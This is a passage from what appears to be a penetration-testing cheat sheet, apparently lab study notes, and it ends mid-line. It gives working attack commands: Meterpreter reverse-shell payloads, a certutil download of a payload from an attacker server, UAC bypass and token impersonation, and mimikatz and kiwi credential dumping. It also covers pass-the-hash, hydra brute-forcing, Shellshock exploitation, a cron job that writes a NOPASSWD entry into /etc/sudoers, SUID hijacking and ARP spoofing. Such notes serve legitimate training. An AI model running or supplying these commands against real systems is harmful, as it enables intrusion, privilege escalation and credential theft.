exploit/windows/winrm/winrm_script_exec + +set USERNAME +set PASSWORD +set FORCE_VBS true +``` + +**Windows Privilege Escalation** + + + +**Kernel** + +``` +# WIN KERNEL +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe + +python3 -m http.server +# Download payload.exe on target +``` + +``` +## Windows-Exploit-Suggester Install +mkdir Windows-Exploit-Suggester +cd Windows-Exploit-Suggester +wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py +# ^^ This is a python3 version of the script + +cd Windows-Exploit-Suggester +python ./windows-exploit-suggester.py --update +pip install xlrd --upgrade + +./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt + +./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt +``` + +``` +## METASPLOIT +## Global set +setg RHOSTS +setg RHOST + +use exploit/multi/handler +options +set payload windows/x64/meterpreter/reverse_tcp +set LHOST +set LPORT + +use post/multi/recon/local_exploit_suggester +set SESSION + +## MsfConsole Meterpreter Privesc +getprivs +getsystem + +# Exploitable vulnerabilities modules +exploit/windows/local/bypassuac_dotnet_profiler +exploit/windows/local/bypassuac_eventvwr +exploit/windows/local/bypassuac_sdclt +exploit/windows/local/cve_2019_1458_wizardopium +exploit/windows/local/cve_2020_1054_drawiconex_lpe +exploit/windows/local/ms10_092_schelevator +exploit/windows/local/ms14_058_track_popup_menu +exploit/windows/local/ms15_051_client_copy_image +exploit/windows/local/ms16_014_wmi_recv_notif +``` + +**UAC** + +``` +# UAC - UACME + +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe + +## METASPLOIT - Listening +setg RHOSTS +setg RHOST + +use exploit/multi/handler +set payload windows/x64/meterpreter/reverse_tcp +set LHOST +set LPORT + +## Meterpreter (Unprivileged session) +cd C:\\ +mkdir Temp +cd Temp +upload /root/backdoor.exe +upload /root/Desktop/tools/UACME/Akagi64.exe +shell +Akagi64.exe 23 C:\Temp\backdoor.exe + +akagi32.exe [Key] [Param] +akagi64.exe [Key] [Param] + +## Elevated Meterpreter Received on the listening session +ps -S lsass.exe +migrate +hashdump +``` + +**Access Token** + +``` +# ACCESS TOKEN IMPERSONATION + +## METASPLOIT - Meterpreter (Unprivileged session) +pgrep explorer +migrate +getuid +getprivs + +load incognito +list_tokens -u +impersonate_token "ATTACKDEFENSE\Administrator" +getuid +getprivs # Access Denied +pgrep explorer +migrate +getprivs +list_tokens -u +impersonate_token "NT AUTHORITY\SYSTEM" +``` + +**Windows Credential Dumping** + + + +``` +# Exploitation +msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1234 -f exe > payload.exe + +python -m SimpleHTTPServer 80 + +## METASPLOIT +setg RHOSTS +setg RHOST + +use exploit/multi/handler +set payload windows/x64/meterpreter/reverse_tcp +set LHOST +set LPORT +run + +## On target system +certutil -urlcache -f http:///payload.exe payload.exe +# Run payload.exe + +# METASPLOIT - Meterpreter +sysinfo +getuid +pgrep lsass +migrate +getprivs + +# Creds dumping - Meterpreter +load kiwi +creds_all +lsa_dump_sam +lsa_dump_secrets + +# MIMIKATZ +cd C:\\ +mkdir Temp +cd Temp +upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe +shell + +mimikatz.exe +privilege::debug +lsadump::sam +lsadump::secrets +sekurlsa::logonPasswords + +# PASS THE HASH +## sekurlsa::logonPasswords +background +search psexec +use exploit/windows/smb/psexec +set LPORT +set SMBUser Administrator +set SMBPass +exploit +``` + +``` +crackmapexec smb -u Administrator -H "" -x "whoami" +``` + +**Linux Exploitation** + + + +**Shellshock** + +``` +# BASH - APACHE +nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" +``` + +``` +## METASPLOIT +# Global set +setg RHOSTS +setg RHOST + +use exploit/multi/http/apache_mod_cgi_bash_env_exec +set RHOSTS +set TARGETURI /gettime.cgi +exploit +``` + +**FTP** + +``` +# FTP +ftp + +ls -lah /usr/share/nmap/scripts | grep ftp-* +searchsploit ProFTPD +``` + +``` +hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 ftp +``` + +**SSH** + +``` +# SSH +ssh @ + +groups sysadmin +cat /etc/*release +uname -r +cat /etc/passwd +find / -name "flag" +``` + +``` +hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt -t 4 ssh +``` + +**SAMBA** + +``` +# SAMBA +smbmap -u -p '' -H + +smbclient -L -U + +enum4linux -a +enum4linux -a -u "" -p "" +``` + +``` +hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb +``` + +**Linux Privilege Escalation** + + + +**Kernel** + +``` +# LINUX KERNEL +## Linux-Exploit-Suggester Install +wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh + +chmod +x linux-exploit-suggester.sh + +./linux-exploit-suggester.sh +``` + +**Cron Jobs** + +``` +# CRON +crontab -l + +find / -name + +printf '#!/bin/bash\necho " ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/ +``` + +**SUID** + +``` +# SUID +file +strings + # find called binary +rm +cp /bin/bash +./ +``` + +**Linux Credential Dumping** + + + +``` +cat /etc/passwd +sudo cat /etc/shadow + +# METASPLOIT (once exploited) +use post/linux/gather/hashdump +set SESSION + +use auxiliary/analyze/crack_linux +set SHA512 true +``` + +#### Network Based Attacks + + + +**Wireshark** + + + +``` +wireshark -i eth1 + +# Filter by ip +ip.add == 10.10.10.9 + +# Filter by dest ip +ip.dest == 10.10.10.15 + +# Filter by source ip +ip.src == 10.10.16.33 + +# Filter by tcp port +tcp.port == 25 + +# Filter by ip addr and port +ip.addr == 10.10.14.22 and tcp.port == 8080 + +# Filter SYN flag +tcp.flags.syn == 1 and tcp.flags.ack ==0 + +# Broadcast filter +eth.dst == ff:ff:ff:ff:ff:ff +``` + +**TShark** + + + +``` +tshark -D +tshark -i eth1 +tshark -r .pcap +tshark -r .pcap | wc -l + +# First 100 packets +tshark -r .pcap -c 100 + +# Protocl hierarchy statistics +tshark -r .pcap -z io,phs -q + +# HTTP traffic +tshark -r .pcap -Y 'http' | more +tshark -r .pcap -Y "ip.src== && ip.dst==" + +# Only GET requests +tshark -r .pcap -Y "http.request.method==GET" + +# Packets with frame time, source IP and URL for all GET requests +tshark -r .pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri + +# Packets with a string +tshark -r .pcap -Y "http contains password" + +# Check destination IP +tshark -r .pcap -Y "http.request.method==GET && http.host==" -Tfields -e ip.dst + +# Check session ID +tshark -r .pcap -Y "ip contains amazon.in && ip.src==" -Tfields -e ip.src -e http.cookie + +# Check OS/User Agent type +tshark -r .pcap -Y "ip.src== && http" -Tfields -e http.user_agent + +# WiFi traffic filter +tshark -r .pcap -Y "wlan" + +# Only deauthentication packets +tshark -r .pcap -Y "wlan.fc.type_subtype==0x000c" +# and devices +tshark -r .pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra + +# Only WPA handshake packets +tshark -r .pcap -Y "eapol" + +# Onyl SSID/BSSID +tshark -r .pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid + +tshark -r .pcap -Y "wlan.ssid==" -Tfields -e wlan.bssid + +# WiFi Channel +tshark -r .pcap -Y "wlan.ssid==" -Tfields -e wlan_radio.channel + +# Vendor & model +tshark -r .pcap -Y "wlan.ta== && http" -Tfields -e http.user_agent +``` + +``` +# ARP POISONING - arpspoof + +## Forward IP packets +echo 1 > /proc/sys/net/ipv4/ip_forward +# arpspoof -i -t -r +arpspoof -i eth1 -t -r +``` + +#### Metasploit + + + +``` +# MSF Install +sudo apt update && sudo apt install metasploit-framework -y +sudo systemctl enable postgresql +sudo systemctl restart postgresql +sudo msfdb init + +ls /usr/share/metasploit-framework +ls ~/.msf4/modules +``` + +``` +service postgresql start && msfconsole -q +``` + +``` +# msfconsole +db_status +help +version + +show -h +show all +show exploits #Aonther way to display exploits +show payloads #display payloads + +search +search cve:2017 type:exploit platform:windows +use +show options #Check options and required value +exploit #Execution of exploitation +set